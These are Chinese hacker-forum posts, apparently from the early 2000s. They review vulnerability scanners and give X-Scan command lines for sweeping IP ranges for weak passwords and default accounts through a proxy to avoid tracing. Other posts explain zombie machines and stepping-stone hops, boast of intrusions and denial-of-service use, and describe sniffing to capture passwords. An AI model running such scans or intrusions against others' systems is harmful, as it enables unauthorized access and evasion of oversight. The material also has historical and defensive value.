“看來你現(xiàn)在也是一個手里沒有刀的黑客，掃描器在一個成熟的黑客手里有著相當大的作用。因為進化到會用掃描器一級的黑客，他們就會很少有人在對那些無知的個人用戶感興趣，注意力更多的被吸引到了服務器上。而對付服務器最好的方法就是找到服務器系統(tǒng)的漏洞，或者服務器相關軟件的漏洞。對于傳統(tǒng)的手工查找來說，不但查找漏洞的速度過于緩慢，而且多數(shù)情況下只能針對某一個特定的漏洞，感覺有點大海撈針的味道。而掃描器就是一種快速尋找服務器系統(tǒng)相關漏洞的工具，通過它們，黑客可以根據(jù)自己的帶寬和系統(tǒng)情況，以他們自己喜歡的速度和方式來快速的尋找系統(tǒng)漏洞，而且這多數(shù)掃描器可以同時掃描多種漏洞，很容易找到系統(tǒng)的漏洞和弱點，此時黑客就可以根據(jù)掃描器提供的漏洞報告和信息，采用合適的攻擊方法對目標給以致命的一擊?！?<BR><BR>　　“前輩，那我如何找到掃描器，平時我好像很少接觸到這些東西啊?！?<BR><BR>　　“呵呵，你用過小榕的流光系列嗎？” <BR><BR>　　“這個當然是接觸過了。” <BR><BR>　　“其實小榕的流光就是一款結合強大掃描功能的軟件，只不過他在流光中加入了一些攻擊和破解成份?！?<BR><BR>“掃描器果然強大，我就曾用流光攻破過許多的黃色和反動網(wǎng)站，特別是他的FTP和新加入的SQLCMD功能，非常的強大。而且界面非常的友好，讓我這種菜鳥用戶很容易上手?！?<BR><BR><BR><BR>　　“你說的不錯，但是雖然小榕的流光非常出色，并兼?zhèn)鋸姶蟮钠平夂凸舫煞?，但是總的來說它不能算的上是一個真正的掃描器。而且流光主要體現(xiàn)在破解，攻擊性很強，沒有太多的對目標系統(tǒng)掃描后的分析報告，所以流光在我看來只能算是是一個涵蓋掃描功能的強大破解軟件?！?<BR><BR>　　“那么在前輩的眼中，什么樣的軟件是一個強大的掃描軟件，什么樣的掃描器才能成為黑客手中的屠龍刀？” <BR><BR>　　“一個好的掃描器必須有簡潔和易于使用的操作界面，強大的分析和掃描信息范圍，對最新漏洞的掃描判斷能力（也就是通常所說的升級概念），詳細的分析結果報告和對漏洞的描述與對策。這樣的“刀”才能算的上是黑客手中的一把寶刀?！?<BR><BR>　　“前輩能否給我點評一下如今最為流行的掃描器的特點和性能呢？” <BR><BR>　　“說道當今網(wǎng)絡安全界流行的掃描器，其中最為優(yōu)秀的就要算是ISS公司出品的商業(yè)掃描器了。它能針對上千種的系統(tǒng)和軟件漏洞對服務器作出全面的細微掃描，而且能夠生成比較詳細的掃描報告，應該說是先進最好的掃描器了。” <BR><BR>　　“前輩這個掃描器我可以從什么地方下載？” <BR><BR>　　“無知！商業(yè)掃描器，當然是不能免費下載的了，你要花錢去買！” <BR><BR>　　“還需要花錢啊，哪有沒有不花錢的掃描器呢？” <BR><BR>　　“當然有了，掃描器是黑客必備的工具之一，要是都花錢去買那不符合黑客的風格。我們可以在網(wǎng)上找到很多免費的而且同樣很優(yōu)秀的黑客掃描器。在國外比較常用的有Cerberus Internet Scanner簡稱CIS，還有烏克蘭SATAN。我們國內(nèi)的也有安全焦點的X-Scanner，與小榕的流光?！?<BR><BR>　　“前輩說的這幾種掃描器我只用過流光，我個人認為流光很出色，其他的掃描器也只有所耳聞，但不知道有什么特點，還請前輩賜教?！?<BR><BR>　　“比起你用過的流光來說，ISS算得上是一個真正的管理員使用的系統(tǒng)掃描工具，首先它能掃描一些眾所周知的系統(tǒng)漏洞和系統(tǒng)弱點，包括一些往往被用戶忽略的問題，這些問題是一些經(jīng)常被黑客利用的漏洞和弱點。ISS有更為強大的漏洞分析功能，并且它不會允許非法訪問，但是實際情況是ISS已經(jīng)背離了它的初衷目的。” <BR><BR>　　“任何好的事物都有不利的一面，更何況一把刀，而且是把寶刀?！?<BR><BR>　　“這話不錯，ISS的確是安全界最為出色的掃描器，而且他還是第一個可以公開得到的多層次掃描器。特別是它的可移植性和靈活性，眾多的UNIX的平臺上都可以運行ISS，ISS的掃描時間和效率也是很快的，很適合于企業(yè)級的用戶?！?<BR>“前輩，我插一句話，雖然ISS足夠強大，但是它畢竟不是免費的午餐，這就不符合我們的黑客精神了。您那里有沒有一些強大而且免費的掃描器？” <BR><BR>　　“掃描器龐大的家族中怎么會沒有免費的，你聽說過NMAP嗎？” <BR><BR>　　“NMAP倒是有所耳聞，以前在許多安全網(wǎng)站上見到過這個名字，但是我不知道它是干什么用的一個東西。” <BR><BR>　　“NMAP其實就是一個功能強大的掃描器。它的強大之處在于它支持UDP，TCP (connect)，TCP SYN(half open)，ftp proxy(bounce attack)，Reverse-ident，ICMP(ping sweep)，F(xiàn)IN，ACK sweep，Xmas Tree，SYN sweep，Null等多種掃描協(xié)議和掃描方式。但是總的來說它的最大的優(yōu)點莫過于隱蔽性高，這是由于它采用的是“半開”的一種掃描方式，此外它提供的Stealth FIN，Xmas Tree與Null掃描模式更是讓被掃描者難以發(fā)現(xiàn)。也正是因為這一點的原因，NMAP深受一些骨灰級黑客的喜愛。像一般黑客喜歡的秘密掃描、動態(tài)延遲、重發(fā)與平行掃描、欺騙掃描、端口過濾探測、RPC直接掃描、分布掃描等，NMAP均可以實現(xiàn)，可以說NMAP是一個靈活性很大的掃描器。通過強大系統(tǒng)的掃描，它還可以分析出服務器的端口處于Open狀態(tài)還是被防火墻保護狀態(tài)?？傊膹姶笫遣谎远鞯?，如果你有一臺聯(lián)網(wǎng)的Linux或者UNIX計算機，那么你就可以去<A href="http://www.insecure.org/nmap/" target=_blank><FONT color=#2f5fa1>http://www.insecure.org/nmap/</FONT></A> 下載得到它。</DIV>

<DIV class=tpc_content id=read_499>黑客常用兵器之掃描篇（下）<BR><BR><BR>　　“前輩，我的系統(tǒng)使用的是Windows，您能不能介紹一些我這種菜鳥級黑客也能用的掃描器？當然前提是在Windows系統(tǒng)下運行啊?！?<BR><BR>　　“既然這樣，我想Cerberus Internet Scanner(CIS)可能比較合適與你，它主要運行在Windows NT和Windows2000的平臺下面，當然它也主要是針對微軟的Windows操作系統(tǒng)進行探測掃描的。CIS擁有絕大多數(shù)菜鳥喜歡的Windows友好界面，而且它提供進行掃描的安全問題也是通常在Windows中經(jīng)常見到的，其中包括： <BR>　?。?） WWW服務 <BR>　?。?） FTP服務 <BR>　　（3） MS SQL Server 數(shù)據(jù)庫掃描 <BR>　?。?） NetBIOS 共享掃描 <BR>　　（5） 注冊表設置 <BR>　?。?） NT服務漏洞 <BR>　?。?） SMTP服務掃描 <BR>　?。?） POP3服務掃描 <BR>　?。?） RPC服務掃描 <BR>　　（10） 端口映射 <BR>　?。?1） Finger服務 <BR>　?。?2） DNS安全掃描 <BR>　?。?3） 瀏覽器安全等 <BR><BR><BR><BR>　　在CIS中，它最為引人注目的還要數(shù)NetBIOS共享掃描。CIS能根據(jù)NetBIOS這一漏洞作出NETBIOS資源信息、共享資源、計算機用戶名、工作組和薄弱的用戶口令等詳細的掃描分析。它的操作方法也是非常的容易，你只需要輸入目標服務器的地址，然后選擇你想要掃描的相關漏洞就可以進行掃描分析了。掃描完畢后他會主動生成一個HTML的報告共你分析結果。你可以在<A href="http://www.cerberus-infosec.co.uk/" target=_blank><FONT color=#2f5fa1>http://www.cerberus-infosec.co.uk/</FONT></A> 下載獲得?！?<BR><BR>“這款掃描器的功能是否太過于簡單了哪？我感覺它比起前幾個您說的那些掃描器，功能過于少了，而且沒有流光那么有成效?！?<BR><BR><BR>　　“SATAN作為掃描器的鼻祖可能很適合你，由于它采用的是一個Perl的內(nèi)核，通過PERL調(diào)用大量的C語言的檢測工具對目標網(wǎng)站進行分析，所以你打開瀏覽器用IE方式就可以直接操作，使用也相對簡單，我就不在這里介紹他浪費時間了。 <BR><BR>　　作為黑客的利刃，國產(chǎn)的CGI &amp; Web Scanner也是一個不錯的掃描器，這個寶刀是由zer9設計完成打造的。這款掃描器主要是針對動態(tài)網(wǎng)站技術的安全問題來設計的?！?<BR><BR>　　“動態(tài)網(wǎng)站？” <BR><BR>　　“對，動態(tài)網(wǎng)站。隨著網(wǎng)站設計的日趨復雜化，網(wǎng)站的技術人員會利用一些諸如CGI、ASP、PHP、jsP等網(wǎng)站動態(tài)交互技術與相應的服務軟件對網(wǎng)站進行開發(fā)，這些東西大大地減輕了網(wǎng)站的維護和更新工作量，但是也正是這些技術，導致了大量的安全問題，特別是很多網(wǎng)站動態(tài)第三方程序在設計之初根本就沒有對安全問題考慮太多，導致了大量的系統(tǒng)漏洞的出現(xiàn)。而CGI &amp; Web Scanner就是專門針對這些動態(tài)的網(wǎng)頁上出現(xiàn)的漏洞進行掃描的一把利刃。 <BR><BR>　　CGI &amp; Web Scanner的主要功能有： <BR>　?。?） 檢測203個已知的CGI漏洞 <BR>　?。?） 通過HTTPD辨認服務器類型 <BR>　?。?） 有更新漏洞的功能 <BR>　　（4） Microsoft SQL Server DOS檢測 <BR>　?。?） Httpd Overflow檢測 <BR>　?。?） IIS Hack檢測 <BR>　　（7） ASP檢測 <BR>　?。?） DOT 漏洞檢測 <BR><BR>　　而且它可以多線程掃描，并對常見的D.O.S（拒絕服務攻擊）和Overflow等也進行探測，很適合初級殺手作為武器。至于你關心的使用方法，就更為簡單了，輸入目標服務器的IP地址，選擇需要掃描的漏洞種類點擊掃描按鍵，就開始了。” <BR><BR><BR>　　“沒有想到國產(chǎn)掃描器還有如此優(yōu)秀的！” <BR><BR>　　“這個是自然，作為黑客的必備武器之一，國產(chǎn)掃描器有很多優(yōu)秀的作品，前面我提到的安全焦點的X-Scanner，就是我最為欣賞的掃描器，而且我老人家也時常常的使用，但是不知道為什么，在對X-Scanner進行病毒測試的時候，熊貓和KV3000都能在X-Scanner里面發(fā)現(xiàn)兩個木馬程序。這一點是我們要非常的注意的。當然也要請安全焦點的朋友做做解釋工作?！?<BR><BR>　　“前輩既然如此欣賞X-Scanner，那就給我詳細介紹一下吧！” <BR><BR><BR><BR>　　“X-Scanner運行在Windows平臺下，它主要針對WindowsNT/Windows 2000操作系統(tǒng)的安全進行全面細致評估，可以掃描出很多Windows系統(tǒng)流行的漏洞，并詳細的指出安全的脆弱環(huán)節(jié)與彌補措施。X-Scanner采用多線程方式對指定IP地址段(或單機)進行安全漏洞掃描，支持插件功能，提供了圖形界面和命令行兩種操作方式。 <BR>　掃描范圍包括： <BR>　　（1）標準端口狀態(tài)及端口banner信息； <BR>　?。?）CGI漏洞； <BR>　?。?）RPC漏洞； <BR>　?。?）SQL-SERVER默認帳戶； <BR>　?。?）FTP弱口令； <BR>　?。?）NT主機共享信息； <BR>　　（7）用戶信息； <BR>　?。?）組信息； <BR>　?。?）NT主機弱口令用戶等。 <BR><BR>　　X-Scanner會將掃描結果保存在/log/目錄中，index_*.htm為掃描結果索引文件。并對于一些已知漏洞，X-Scanner給出了相應的漏洞描述，利用程序及解決方案。X-Scanner掃描的內(nèi)容是絕大多數(shù)的服務器容易出現(xiàn)的漏洞和安全設置問題。最常用的還是其中的SQL默認帳戶、FTP弱口令和共享掃描，他們能揭示出許多麻痹大意的網(wǎng)管犯的一些低級錯誤?！?<BR><BR><BR>　　“前輩能不能具體說說X-Scanner如何使用呢？” <BR><BR>　　“打開了X-Scanner，在掃描項目中可以任意的指定單獨掃描哪一個特定的項目。比較多的是CGI和SQL或者FTP默認口令，這些都是很致命的服務器漏洞?！?<BR><BR><BR><BR>　　“下一步需要在〖掃描設置〗中進行參數(shù)的設置。一般的情況下，只對〖運行參數(shù)〗中的掃描范圍進行設置。在那里只要填寫網(wǎng)站服務器的IP地址就可以，可以填寫一個來針對某一個特定的網(wǎng)站或服務器，也可以填寫一個IP段范圍，來掃描一段IP地址上所有的計算機。具體掃描參數(shù)格式如下： <BR><BR>　　1.命令行：Xscan -h [起始地址]&lt;-[終止地址]&gt; [掃描選項] <BR><BR>　　 其中的[掃描選項]含義如下： <BR>　　 -p: 掃描標準端口(端口列表可通過\dat\config.ini文件定制)； <BR>　　 -b: 獲取開放端口的banner信息，需要與-p參數(shù)合用； <BR>　　 -c: 掃描CGI漏洞； <BR>　　 -r: 掃描RPC漏洞； <BR>　　 -s: 掃描SQL-SERVER默認帳戶； <BR>　　 -f: 嘗試FTP默認用戶登錄(用戶名及口令可以通過\dat\config.ini文件定制)； <BR>　　 -n: 獲取NetBios信息(若遠程主機操作系統(tǒng)為Windows9x/NT4.0/2000)； <BR>　　 -g: 嘗試弱口令用戶連接(若遠程主機操作系統(tǒng)為Windows NT4.0/2000)； <BR>　　 -a: 掃描以上全部內(nèi)容； <BR><BR>-x [代理服務器:端口]: 通過代理服務器掃描CGI漏洞； <BR>　　 -t: 設置線程數(shù)量，默認為20個線程； <BR>　　 -v: 顯示詳細掃描進度； <BR>　　 -d: 禁止掃描前PING被掃主機。 <BR><BR>　　2.示例： <BR>　　Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a <BR>　　含義：掃描XXX.XXX.1.1-XXX.XXX.10.255網(wǎng)段內(nèi)主機的所有信息； <BR><BR>　　Xscan -h xxx.xxx.1.1 -n -g -t 30 <BR>　　含義：獲取XXX.XXX.1.1主機的Netbios信息，并檢測NT弱口令用戶，線程數(shù)量為30； <BR><BR>　　Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d <BR>　　含義：掃描xxx.xxx.1.1主機的標準端口狀態(tài)，通過代理服務器"129.66.58.13:80"掃描CGI漏洞，檢測端口banner信息，且掃描前不通過PING命令檢測主機狀態(tài)，顯示詳細掃描進度?！?<BR><BR><BR><BR>　　“在〖運行參數(shù)〗中，有很大的選擇余地，比如它可以設置代理服務器來躲避網(wǎng)管的追查，并課以設置掃描的線程。對掃描顯示也可以進行詳細的選擇。然后掃描器就開始工作了?！?<BR><BR>　　“好啊，我去試試?！?<BR><BR>　　“另外我要提醒你注意的是，在使用這些掃描軟件的時候一定要看清楚里面有沒有可以的程序，以防自己先中了別人的招。此外，雖然你刺客手中有刀，但是現(xiàn)在的網(wǎng)站管理員也會使用這些寶刀，所以說，手中有絕世好刀，不一定就能殺死所有的敵人。好了，你去吧！”</DIV>

<DIV class=tpc_content id=read_500>代理、肉雞、跳板的概念<BR><BR>看到有的網(wǎng)友還用那種8080、80端口的代理，我有話說，也可以說為大家做一點最最基礎的黑客教程，大家看完自己去做吧，具體怎么做，我就不說了，可以說我把我所知道的肉雞和跳板的概念知識全部告訴大家了，我也在幾個地方發(fā)表過，這是我的原創(chuàng)，我要告訴大家的是真正在黑客搶劫服務器是用的跳板是什么，以及黑客們很少說的跳板知識介紹~~~~~~~~~~我有個習慣，<BR>總是喜歡讓大家看一篇文章的時候知道：為 什么要看這篇文章？這篇文章要讓<BR>自己知道或是學到什么東西，我盡量把自己所 掌握的東西盡量簡化后用通俗的<BR>語言表達。大家看完后有什么不好的地方，請指出，我好學習到新的東西，我很高興自己能<BR>把自己所學到的東西和大家分享，在 這里的認識的網(wǎng)友們有想成為黑客的；有<BR>想隨便玩玩；有的想學，但是不久就感<BR>覺學網(wǎng)絡安全很難就退卻了。我真的很希望大家能找到自己的目標，做自己喜歡<BR>的事情，不要一天就黑小企鵝和一天泡在別人的軟件里（至少要嘗試讀一些簡單的<BR><BR>代碼），學習黑客知識是孤獨的，必須完全靠自己的努力，很少有人能幫你的，<BR><BR>開始你會覺得很無助，但是慢慢的，你將習慣這種感覺和方式，要自己努力才會<BR><BR>有成果的，我和大家一樣也在不停的探索網(wǎng)絡知識，現(xiàn)在不過是把自己學到的東<BR><BR>西和大家分享罷了。是不是我象大姨媽?。?！呵呵~~~婆婆***！我看到很<BR>多的網(wǎng)友聊代理的時候，概念很模糊，甚至搞出了笑話，所以今天我就談談很多<BR>朋友初涉網(wǎng)安的一個<BR><BR>誤區(qū)（認識代理、跳板、肉雞）。有的網(wǎng)友說那還不簡單，找個運行就能隱藏IP<BR><BR>的軟件，我早說過了，我沒有見過這種軟件或許說根本不存在這種軟件（懶惰的<BR><BR>人更勤于此道）再者對搶劫服務器者而言把自己的身家性命放在一個隱藏自己IP的軟件<BR><BR>上是很不明智的，要知道搶劫服務器時會嘗試很多的連接，在你一不小心的時候你就把<BR><BR>自己賣了（我曾經(jīng)在一次搶劫服務器完畢后沒有用sc32設置好跳板的IE，而是隨手在<BR><BR>桌面上雙擊瀏覽器去看黑頁，結果把自己給賣了，本來沒有什么可怕的，但是我<BR><BR>們要養(yǎng)成做任何事都無懈可擊的習慣。再者~~~噓噓~~還好是RB鬼子的系統(tǒng)<BR><BR>。）所以我根本不相信什么隱藏IP的軟件，也許我孤陋寡聞或是真有這樣的東西<BR><BR>，但至少我是不會用的，除非有人張羅著把我斃了，那么我可以考慮一下。<BR><BR>我要說此文適合菜鳥閱讀，高手止步?。?！<BR><BR>我上小企鵝，老有網(wǎng)友問我代理和跳板以及肉雞是指同一類概念嗎？它們怎么樣工<BR><BR>作的？<BR><BR>因為在小企鵝上不可能講很清楚，涉及的東西太多了，因為此文是面向和我一樣初<BR><BR><BR>人涉網(wǎng)絡網(wǎng)絡安全的朋友，那么我就簡單的說說。<BR><BR>首先是代理（泛指80；8080；1080端口），很多網(wǎng)友認為用代理獵手設置好<BR><BR>端口之后就可以為自己找個代理在IE、FTP等里面設置后來隱藏IP，這就是肉雞<BR><BR>或認為這就是跳板，其實不然，為什么呢？就我個人來看這樣的代理簡直就是垃<BR><BR>圾（有的網(wǎng)友不服氣了，等等，我一會告訴你為什么我這么說），1、首先一個<BR><BR>速度比較慢，我用這樣的代理用過很多國家，包括國內(nèi)的，感覺都是其慢，沒有<BR><BR>那種快速的感覺；2、不穩(wěn)定。大家一定都想擁有一個穩(wěn)定的代理吧~~~呵呵<BR><BR>但是這樣的代理通常有原因的，不是服務器自身漏洞就是為了自身利益而增加的<BR><BR>服務，當他的愿望達成以后或是網(wǎng)管發(fā)現(xiàn)以后，你就不能再用了。3、多人使用。如果你<BR><BR>用8080、1080、80等端口的代理，我敢保證這個代理不止你一個人用，如果<BR><BR>你想成為一個黑客或是老手的話，擁有一個自己的代理是必須的。4、保密性。<BR><BR>有的代理服務器提供者很可惡，他們利用代理得知你的密碼或一些敏感信息，因<BR><BR>為普通代理數(shù)據(jù)沒有經(jīng)過加密（1080端口除外），用一個嗅探器就可以知道你<BR><BR>輸入的數(shù)據(jù)，別忘了代理的最最基本原理是數(shù)據(jù)轉(zhuǎn)發(fā)喲。好了，有了以上的缺點<BR><BR>你還敢用或是有信心用它嗎？這就是我為什么叫它垃圾的原因了。有網(wǎng)友會問：<BR><BR>那什么樣的代理才沒有這些缺點呢？別急，我下面就要說。<BR><BR>socks5.這是一個很不錯的跳板軟件，很?。?2K）功能卻是不凡，它是sock4<BR><BR>的接替者，原來的sock4只支持UDP協(xié)議（這個大家去看書吧，我不多說了），<BR><BR>而sock5支持USP和TCP兩種協(xié)議，還有數(shù)據(jù)的傳輸是加密的所以真的很佩服作者的編程能力。如果你簡<BR><BR>單的使用它，那你上個小企鵝啊或IRC啦，那是沒有什么問題啦，而且它的速度很快<BR><BR>幾乎和你使用本地機沒有什么差別（當然不能加太多跳板），sock5支持你搭建<BR><BR>255個跳板，也就是你可以用skserverGUI來編輯多達255個安裝了sock5的機<BR><BR>器來運行達到你隱藏IP的目的，但我想如果我看見有人這樣做的話，我會馬上打<BR><BR>電話到精神病院~~~：）而且用sc32來配合skserverGUI的話，那么你的電腦<BR><BR>幾乎就沒有應用程序不能用代理的。你用過之后一定會說：我喜歡！我選擇！sock5的安裝也很簡單，在此軟件的說明書里有，因為我主要是讓大家了解代理------&amp;g*;跳板------&amp;g*;肉雞的簡單原理；再者因為制作這樣的跳板或肉雞很有攻擊性（會構成非法使用<BR><BR>他人電腦），而且網(wǎng)上有很多人不自覺，我可不想以后有人被抓了，說我<BR><BR>曾經(jīng)為他的犯罪生涯做過貢獻。<BR><BR>好了！最后我們來說說肉雞吧<BR><BR>肉雞是什么？在小企鵝上也有朋友問我，我認為這是中國黑客對自己開了后門的服<BR><BR>務器為將來自己做一些事時使用的機器的一種自豪而又親切的叫法.肉雞是老手<BR><BR>常用的代理，也就是*elne*的那種，完全是靠自己制作的，端口加密碼啦！絕對<BR><BR>只有你一個人用，當然被別人提前下手的話，那你就清除它的后門就可以了，當<BR><BR>你第一次擁有這種服務器的時候你的心情是什么樣的？我個人感覺是象初戀一樣<BR><BR>。<BR><BR>有3389肉雞通?？梢詧D形化*作，從而發(fā)動拒絕服務攻擊，那么我們用什么樣<BR>系統(tǒng)的肉雞呢？~~~~恩！marke這個<BR><BR>問題問的很好~~：）<BR><BR>我喜歡用windows 2000和linux，雖然我一直采用WIN 2000但是告訴大家一個<BR><BR>好消息我剛剛擁有了自己第一臺LINUX肉雞，對我這個正在學習LINUX的家伙來<BR><BR>說，沒事到上面熟悉一下LINUX指令是件很愉快的事。要想學用這種肉雞必須熟<BR><BR>練DOS指令（指windows)，因為沒有圖形界面讓你玩的。做一個黑客必須適應字符化的*作<BR>當你*elne*到一臺你服務器里（肉雞）<BR><BR><BR>你就可以踏雪無痕了，就象“信息公路牛崽”（搶劫服務器五角大樓的美國天才黑客）一<BR><BR>樣先連接到RB、到中東、再繞回美國本土搶劫服務器五角大樓，聽上去很神秘吧，其<BR><BR>實用的原理就是這個。</DIV>

<DIV class=tpc_content id=read_501>網(wǎng)絡監(jiān)聽概念<BR><BR><BR>網(wǎng)絡監(jiān)聽工具的提供給管理員的一類管理工具。使用這種工具，可以監(jiān)視網(wǎng)絡的狀態(tài)、數(shù)據(jù)流動情況以及網(wǎng)絡上傳輸?shù)男畔ⅰ?<BR><BR>　　但是網(wǎng)絡監(jiān)聽工具也是黑客們常用的工具。當信息以明文的形式在網(wǎng)絡上傳輸時，便可以使用網(wǎng)絡監(jiān)聽的方式來進行攻擊。將網(wǎng)絡接口設置在監(jiān)聽模式，便可以源源不斷地將網(wǎng)上傳輸?shù)男畔⒔孬@。 <BR><BR>　　網(wǎng)絡監(jiān)聽可以在網(wǎng)上的任何一個位置實施，如局域網(wǎng)中的一臺主機、網(wǎng)關上或遠程網(wǎng)的調(diào)制解調(diào)器之間等。黑客們用得最多的是截獲用戶的口令。 <BR><BR>　　什么是網(wǎng)絡監(jiān)聽 <BR><BR>　　網(wǎng)絡監(jiān)聽是黑客們常用的一種方法。當成功地登錄進一臺網(wǎng)絡上的主機，并取得了這臺主機的超級用戶的權限之后，往往要擴大戰(zhàn)果，嘗試登錄或者奪取網(wǎng)絡中其他主機的控制友。而網(wǎng)絡監(jiān)聽則是一種最簡單而且最有效的方法，它常常能輕易地獲得用其他方法很難獲得的信息。 <BR><BR>　　在網(wǎng)絡上，監(jiān)聽效果最好的地方是在網(wǎng)關、路由器、防火墻一類的設備處，通常由網(wǎng)絡管理員來操作。使用最方便的是在一個以太網(wǎng)中的任何一臺上網(wǎng)的主機上，這是大多數(shù)黑客的做法。<BR><BR><BR><BR><BR>以太網(wǎng)中可以監(jiān)聽的原因 <BR><BR>　　在電話線路和無線電、微波中監(jiān)聽傳輸?shù)男畔⒈容^好理解，但是人們常常不太理解為什么局域網(wǎng)中可以進行監(jiān)聽。甚至有人問：能不能監(jiān)聽不在同一網(wǎng)段的信息。下面就講述在以太網(wǎng)中進行監(jiān)聽的一些原理。在令牌環(huán)中，道理是相似的。 <BR><BR>　　對于一個施行網(wǎng)絡攻擊的人來說，能攻破網(wǎng)關、路由器、防火墻的情況極為少見，在這里完全可以由安全管理員安裝一些設備，對網(wǎng)絡進行監(jiān)控，或者使用一些專門的設備，運行專門的監(jiān)聽軟件，并防止任何非法訪關。然而，潛入一臺不引人注意的計算機中，悄悄地運行一個監(jiān)聽程序，一個黑客是完全可以做到的。監(jiān)聽是非常消耗CPU資源的，在一個擔負繁忙任務的計算機中進行監(jiān)聽，可以立即被管理員發(fā)現(xiàn)，因為他發(fā)現(xiàn)計算機的響應速度令人驚奇慢。 <BR><BR>　　對于一臺連網(wǎng)的計算機，最方便的是在以太網(wǎng)中進行監(jiān)聽，只須安裝一個監(jiān)聽軟件，然后就可以坐在機器旁瀏覽監(jiān)聽到的信息了。 <BR><BR>　　以太網(wǎng)協(xié)議的工作方式為將要發(fā)送的數(shù)據(jù)包發(fā)往連在一起的所有主機。在包頭中包含著應該接收數(shù)據(jù)包的主機的正確地址。因此，只有與數(shù)據(jù)包中目標地址一致的那臺主機才能接收信包。但是，當主機工在監(jiān)聽模式下，無論數(shù)據(jù)包中的目標物理地址是什么，主機都將接收。 <BR><BR>　　在Internet上，有許多這樣的局域網(wǎng)。幾臺甚至十幾臺主機通過一條電纜一個集線器連在一起。在協(xié)議的高層或用戶看來，當同一網(wǎng)絡中的兩臺主機通信時，源主機將寫有目的主機IP地址的數(shù)據(jù)包發(fā)向網(wǎng)關。但是，這種數(shù)據(jù)包并不能在協(xié)議棧的高層直接發(fā)送出去。要發(fā)送的數(shù)據(jù)包必須從TCP/IP協(xié)議的IP層交給網(wǎng)絡接口，即數(shù)據(jù)鏈路層。 <BR><BR>　　網(wǎng)絡接口不能識別IP地址。在網(wǎng)絡接口，由IP層來的帶有IP地址的數(shù)據(jù)包又增加了一部分信息：以太幀的幀頭。在帖頭中，有兩個域分別為只有網(wǎng)絡接口才能識別的源主機和目的主機的物理地址，這是一個48位的地址。這個48位的地址是與IP地址對應的。也就是說，一個IP地址，必然對應一個物理地址。對于作為網(wǎng)關的主機，由于它連接了多個網(wǎng)絡，因此它同時具有多個IP地址，在每個網(wǎng)絡中，它都有一個。發(fā)向局域網(wǎng)之外的幀中攜帶的是網(wǎng)關的物理地址。<BR><BR><BR><BR><BR>在以太網(wǎng)中，填寫了物理地址的幀從網(wǎng)絡接口中，也就是從網(wǎng)卡中發(fā)送出去，傳送到物理的線路上。如果局域網(wǎng)是由一條粗纜或細纜連接機而成，則數(shù)字信號在電纜上傳輸，信號能夠到達線路上的每一臺主機。當使用集線器時，發(fā)送出去的信號到達集線器，由集線器再發(fā)向連接在信線器上的每一條線路。于是，在物理線路上傳輸?shù)臄?shù)字信號也能到達連接在集線器上的每一主機。 <BR><BR>　　數(shù)字信號到達一臺主機的網(wǎng)絡接口時，在正常情況下，網(wǎng)絡接口讀入數(shù)據(jù)幀，進行檢查，如果數(shù)據(jù)幀中攜帶的確良物理地址是自己的，或者物理地址是廣播地址，則將數(shù)據(jù)幀交給上層協(xié)議軟件，也就是IP層軟件，否則就將這個幀丟棄。對于每一個到達網(wǎng)絡接口的數(shù)據(jù)幀，都要進行這個過程。然而，當主機工作在監(jiān)聽模式下，則所有的數(shù)據(jù)幀都將被交給上層協(xié)議軟件處理。 <BR><BR>　　局域網(wǎng)的這種工作方式，一個形象的例子是，大房間就像是一個共享的信道，里面的每個人好像是一臺主機。人們所說的話是信息包，在大房間中到處傳播。當我們對其中某個人說話時，所有的人都能聽到。但只有名字相同的那個人，才會對這些話語做出反映，進行處理。其余的人聽到了這些談話，只能從發(fā)呆中猜測，是否在監(jiān)聽他人的談話。 <BR><BR>　　當連接在同一條電纜或集線器上的主機被邏輯地分為幾個子網(wǎng)時，如果一臺主機處于監(jiān)聽模式下，它還能接收到發(fā)向與自己不在同一子網(wǎng)(使用了不同的掩碼、IP地址和網(wǎng)關)的主機的那些信包。也就是說，在同一條物理信道上傳輸?shù)乃行畔⒍伎梢员唤邮盏健?<BR><BR>　　許多人會問：能不能監(jiān)聽不在同一個網(wǎng)段計算機傳輸?shù)男畔?。答案是否定的，一臺計算機只能監(jiān)聽經(jīng)過自己網(wǎng)絡接口的那些信包。否則，我們將能監(jiān)聽到整個Internet,情形會多么可怕。<BR><BR><BR><BR><BR><BR>目前的絕大多數(shù)計算機網(wǎng)絡使用共享的通信信道。從上面的討論中，我們知道，通信信道的共享意味著，計算機有可能接收發(fā)向另一臺計算機的信息。 <BR><BR>　　另外，要說明的是，Internet中使用的大部分協(xié)議都是很早設計的，許多協(xié)議的實現(xiàn)都是基于一種非常友好的，通信的雙方充分信任的基礎之上。因此，直到現(xiàn)在，網(wǎng)絡安全還是非常脆弱的。在通常的網(wǎng)絡環(huán)境下，用戶的所有信息，包手戶頭和口令信息都是以明文的方式在網(wǎng)上傳輸。因此，對于一個網(wǎng)絡黑客和網(wǎng)絡攻擊者進行網(wǎng)絡監(jiān)聽，獲得用戶的各種信息并不是一件很困難的事。只要具有初步的網(wǎng)絡和TCP/IP協(xié)議知識，便能輕易地從監(jiān)聽到的信息中提取出感興趣的部分。 <BR><BR>　　網(wǎng)絡監(jiān)聽常常要保存大量的信息，對收集的信息進行大量的整理工作，因此，正在進行監(jiān)的機器對用戶的請求響應很慢。 <BR><BR>　　首先，網(wǎng)絡監(jiān)聽軟件運行時，需要消耗大量的處理器時間，如果在此時，就詳細地分析包中的內(nèi)容，許多包就會來不信接收而漏掉。因此，網(wǎng)絡監(jiān)聽軟件通常都是將監(jiān)聽到的包存放在文件中，待以后再分析。 <BR><BR>　　其次，網(wǎng)絡中的數(shù)據(jù)包非常復雜，兩臺主機之間即使連續(xù)發(fā)送和接受數(shù)據(jù)包，在監(jiān)聽到的結果中，中間必然會夾雜了許多別的主機交互的數(shù)據(jù)包。監(jiān)聽軟件將同一TCP會話的包整理到一起，已經(jīng)是很不錯了。如果還希望將用戶的詳細信息整理出瞇，需要根據(jù)協(xié)議對包進行大量的分析。面對網(wǎng)絡上如此眾多的協(xié)議，這個監(jiān)聽軟件將會十分龐大。 <BR><BR>　　其實，找這些信息并不是一件難事。只要根據(jù)一定的規(guī)律，很容易將有用的信息一一提取出來。</DIV>

